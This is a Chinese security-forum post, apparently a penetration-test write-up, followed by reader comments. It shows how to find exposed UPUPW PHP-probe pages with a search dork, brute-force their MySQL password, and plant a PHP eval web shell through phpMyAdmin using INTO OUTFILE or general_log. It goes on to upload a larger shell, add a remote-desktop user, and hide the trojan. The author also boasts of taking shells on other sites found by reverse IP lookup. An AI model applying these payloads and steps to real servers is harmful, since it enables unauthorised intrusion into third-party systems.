项目实战 - 看我如何获得权限进入目标桌面

aj545302905   ·   发表于 17天前   ·   技术文章投稿区

前言

我今天授权项目上遇到了一个站点,然后成功拿下服务器,我联想到了是否可以通过谷歌与法寻找到更多存在这样问题的网站,然后我简单的一搜索发现有很多,在这里我将分享这次项目的实战过程和经验。

在这里声明一下,大家无论做什么都要遵守中华人民共和国网络安全法,在没有得到授权的情况下是不能这样渗透的

一. 信息收集

  • 这里的信息收集比较简单,并不需要繁琐的域名 whois 和端口扫描。
  • 我们也不需要费尽心思的去寻找”谷歌镜像站”
  • 跟着我打开”www.baidu.com”在其中输入——“PHP探针-UPUPW绿色服务器平台”相关字眼

    搜索结果如下:

然后我们随机打开一个网页,页面呈现给我们的内容如下[这里的截图是项目上的网站的内容截图,你们百度找到的也是一样的]:

我们发现该网站底部有的数据库交互功能!

显然 它已经告诉我们该网站的数据库账号 那我们是不是只要爆破出其密码就可以呢(ps:这样的页面通常是没有拦截访问限制的,所以大家可以提高线程去爆破大字典)

此处成功爆破出数据库密码,并且登录成功。[SRC挖掘到这一步就可以提交了,没有授权的话不要去做后面的操作]

二.进入数据库 植入木马

我们在进入数据库之前呢需要将 “当前网站目录”记住(最好记在txt文本里)

然后点击下方的phpMyadmin 进入登录页面 输入账号密码后进入数据库内部

登录后测试一下SQL语句是否可执行

当我们得知SQL语句可执行后 那么我们就要写小马了

select '<?php @eval($_REQUEST[a]);?>'
into outfile "网站根目录//xiaoma.php"

执行成功后看一下能否访问我们的小马

三.菜刀链接

至此我们已经拿到该网站的webshell

但是,后来我感觉这是一个游戏网站,类似于是兄弟就来砍我的那种网游服务器 因为域名就是传奇XX,后来发现不是这个样子的hhh

这其实就可以搞一搞了 说不定能白嫖免费的服务器用呢

四.大马维持权限

  • 我想用菜刀浏览一下其他目录里面的文件 去给我提示”执行成功,但是发生错误”
  • 一开始我以为是菜刀生锈了,后来发现原因可能并不是这样。
  • 既然连接上菜刀 那么我就可以上传大马
  • 我从网上随便下了一个大马.py
  • 将其修改为dama.php格式,并查看大马的源码 将连接密码修改为”123456”
  • 再修改大马的编码格式:改为utf-8 //之前编码格式为gbk存在乱码现象//。

将大马上传至菜刀

连接大马

连接成功

连接成功后依旧没法 进行目录的跳转!!!

所以要想遍历C盘全目录我们还需另寻他法。

五.山重水复疑无路,柳暗花明又一村

我们用大马扫描一下目标服务器开放的端口

注意:这是在内网进行的端口扫描,所以可以绕过防火墙的拦截,扫描出隐藏端口

我们通过端口扫描发现突破口:135,3389端口

  • 135
  • 远程过程调用
  • 3389:
  • 远程桌面连接

不多BB,直接net user一条龙服务走一波。

创建用户:

查看权限为system 直接省略提权过程(是不是很舒服)


远程连接:


拒绝访问,但我感觉应该是用户权限问题

所以我们对AnJian用户进行提权

再次连接:

好吧 明显是台充当服务的虚拟机,然后我们再遍历C盘目录。

小宝贝儿 看你还顽不顽皮

木马隐藏:

虽然被隐藏 但是可以通过杀软扫描出来

那也无所谓啊 谁会在虚拟机安装杀软?

IP反查:

通过ip138.com对该IP进行反查,查询其注册过的站点



这样我们我们同时拿到3个站点的webshell //其中两个站点挂掉了

拓展一:

我们通过ipconfig -all 和 arp -a 进行探测 获取网关地址 实施ARP欺骗

后面的就是编写ARP欺骗脚本的内容了 如果大家感兴趣 我也可以写一篇有关如何编写ARP欺骗脚本的文章给你们学习哦~

补充:

phpmyadmin通过日志拿webshell

经老师指点,上述方法容易出ERROR1290的错误(是文件导出做了限制。所以在配置中修改限制信息)。

说白了就是不让导出文件,高版本mysql需要修改my.ini才可以利用

所以为了稳妥起见,我们可以用修改日志的方法进行webshell。

下面是我参考别人文章

条件:ROOT权限

进入phpmyadmin后先要把general log设置为ON。

然后将文件修改日志文件名修改,修改成可被容器解析的php文件。

这里他是将日志文件名称修改为def2.php,并且把路径改为网站根目录

然后随便执行一条sql语句。就比如SELECT一个小马。

这样<?php @eval($_REQUEST[a]);?>就被记录在日志中了,而日志又是可被解析PHP文件,所以日志就成了一个小马了

菜刀连接:

本次渗透测试到此就告一段路了,谢谢大家观看 如果觉得不错 请点个赞再走吧~

用户名金币积分时间理由
奖励系统 100.00 0 2020-08-01 10:10:27 投稿满 10 赞奖励
奖励系统 50.00 0 2020-07-31 08:08:07 投稿满 5 赞奖励
Track-聂风 150.00 0 2020-07-30 15:03:34 支持同学继续发文

打赏我,让我更有动力~

7 Reply   |  Until 13天前 | 461 View

Track-聂风
发表于 16天前

啥时候有空记得把上一篇的采集代理服务器的文章补充完整

评论列表

  • 加载数据中...

编写评论内容

kidll
发表于 16天前

大佬 牛逼

评论列表

  • 加载数据中...

编写评论内容

zhangjialu
发表于 15天前

真香~

评论列表

  • 加载数据中...

编写评论内容

wl1358042098
发表于 15天前

打卡——>获得权限进入目标桌面

评论列表

  • 加载数据中...

编写评论内容

xiaoc
发表于 14天前

加油

评论列表

  • 加载数据中...

编写评论内容

tc
发表于 14天前

@楼主,这种漏洞是怎么造成的,是因为PHP探针的问题吗,是不是只要PHP探针删掉就可以防止出现这个漏洞了

评论列表

  • 加载数据中...

编写评论内容

杜小孙
发表于 13天前

牛逼哄哄

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部

掌控者 © 2016. All Rights Reserved. 掌控者

Powered by 掌控者 Version 2.1.3